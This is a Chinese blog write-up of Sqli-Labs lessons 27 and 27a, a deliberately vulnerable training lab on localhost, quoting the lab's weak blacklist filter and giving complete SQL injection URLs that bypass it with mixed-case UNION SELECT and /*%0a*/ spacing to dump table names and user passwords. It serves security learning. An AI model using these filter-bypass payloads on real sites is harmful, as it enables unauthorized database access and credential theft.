Sqli-Labs:Less 27 - Less 27a

Less 27

基于错误_GET_过滤UNION/SELECT_单引号_字符型注入

0x01. 判断注入类型

http://localhost:8088/sqlilabs/Less-27/?id=1'

http://localhost:8088/sqlilabs/Less-27/?id=2'%26%26'1'='1

单引号闭合,无小括号。

0x02. 判断过滤与绕过

目不忍视:

$id = blacklist($id);
$hint = $id;
function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"",$id);       //strip out /*
    $id= preg_replace('/[--]/',"",$id);         //Strip out --.
    $id= preg_replace('/[#]/',"",$id);          //Strip out #.
    $id= preg_replace('/[ +]/',"",$id);         //Strip out spaces.
    $id= preg_replace('/select/m',"",$id);      //Strip out spaces.
    $id= preg_replace('/[ +]/',"",$id);         //Strip out spaces.
    $id= preg_replace('/union/s',"",$id);       //Strip out union
    $id= preg_replace('/select/s',"",$id);      //Strip out select
    $id= preg_replace('/UNION/s',"",$id);       //Strip out UNION
    $id= preg_replace('/SELECT/s',"",$id);      //Strip out SELECT
    $id= preg_replace('/Union/s',"",$id);       //Strip out Union
    $id= preg_replace('/Select/s',"",$id);      //Strip out select
    return $id;
}

仔细看看其实还好,没有过滤orand,过滤了几个大小写的unionselect但是可以用随机大小写绕过,过滤了--#以及/**/,过滤了两次空格,过滤了/但没过滤\
所以实际上只过滤了注释空格,与 Less 26 相似。

0x03. PHP语法

正则表达式

PHP正则表达式的模式修饰符(官方文档)
PHP正则中的i,m,s,x,e

  • i
    如果设定了此修正符,模式中的字符将同时匹配大小写字母。
  • m
    如果设定了此修正符,行起始和行结束除了匹配整个字符串开头和结束外,还分别匹配其中的换行符的之后和之前。
  • s
    如果设定了此修正符,模式中的圆点元字符.匹配所有的字符,包括换行符。没有此设定的话,则不包括换行符。
  • x
    如果设定了此修正符,模式中的空白字符除了被转义的或在字符类中的以外完全被忽略,在未转义的字符类之外的#以及下一个换行符之间的所有字符,包括两头,也都被忽略。
  • e
    如果设定了此修正符,preg_replace()在替换字符串中对逆向引用作正常的替换。
  • ?
    ./+/*之后表示非贪婪匹配,./+/*限定符都是贪婪的,它们会尽可能多的匹配文字,在它们的后面加上一个?就可以实现非贪婪或最小匹配。

0x04. 注入过程

这关同 Less 26,可以明注、报错注入、盲注。

0x04-01. 基于正确注入

这关可以用%a0代替空格,但这里多了一种用/*%0a*/强行制造空格。
原理暂不清楚,但 Less 26 无法使用,且只有%0a可以。

步骤1:数据库名

http://localhost:8088/sqlilabs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,database(),4/*%0a*/||/*%0a*/'1'='1

步骤2:表名

http://localhost:8088/sqlilabs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(table_name)/*%0a*/from/*%0a*/information_schema.tables/*%0a*/where/*%0a*/table_schema='security'),4/*%0a*/||/*%0a*/'1'='1

步骤3:字段名

http://localhost:8088/sqlilabs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(column_name)/*%0a*/from/*%0a*/information_schema.columns/*%0a*/where/*%0a*/table_schema='security'/*%0a*/%26%26/*%0a*/table_name='users'),4/*%0a*/||/*%0a*/'1'='1

步骤4:数据

http://localhost:8088/sqlilabs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(concat_ws('$',id,username,password))/*%0a*/from/*%0a*/users),4/*%0a*/||/*%0a*/'1'='1

0x04-02. 基于错误注入

0x04-03. 基于Bool盲注

同 Less 26,将双写的or去掉,将select替换为SeLeCt即可。

Less 27a

基于错误_GET_过滤UNION/SELECT_双引号_字符型_盲注*

11'正常回显,1"报错,双引号字符型。
2"%26%26"1"="1回显为id=2,无小括号。

同 Less 27 的基于正确注入基于Bool盲注

©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,711评论 6 493
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,079评论 3 387
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,194评论 0 349
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,089评论 1 286
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,197评论 6 385
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,306评论 1 292
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,338评论 3 412
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,119评论 0 269
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,541评论 1 306
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,846评论 2 328
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,014评论 1 341
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,694评论 4 337
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,322评论 3 318
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,026评论 0 21
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,257评论 1 267
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,863评论 2 365
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,895评论 2 351

推荐阅读更多精彩内容

  • Sqli-Labs:Less 26 - Less 26a
    Less 26 基于错误_GET_过滤空格/注释_单引号_字符型注入 0x01. 判断注入类型 http://lo...
    Hyafinthus阅读 6,335评论 1 6
  • 高级绕过总结
    web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 7,266评论 0 5
  • Sqli-Labs:Less 23
    基于错误_GET_过滤注释_单引号_字符型注入 Page 2 的高级关主要是各种过滤与限制条件,又回到了GET很是...
    Hyafinthus阅读 1,480评论 0 4
  • sqli-labs(less23-less37)
    LESS-23 SQL语句$sql="SELECT * FROM users WHERE id='$id' LIM...
    BerL1n阅读 1,850评论 0 2
  • day 72
    《极简经济学》 所有成本都是机会成本(opportunity cost)。当你做一个选择时,你没有选择的东西就是经...
    琳小喵阅读 196评论 0 0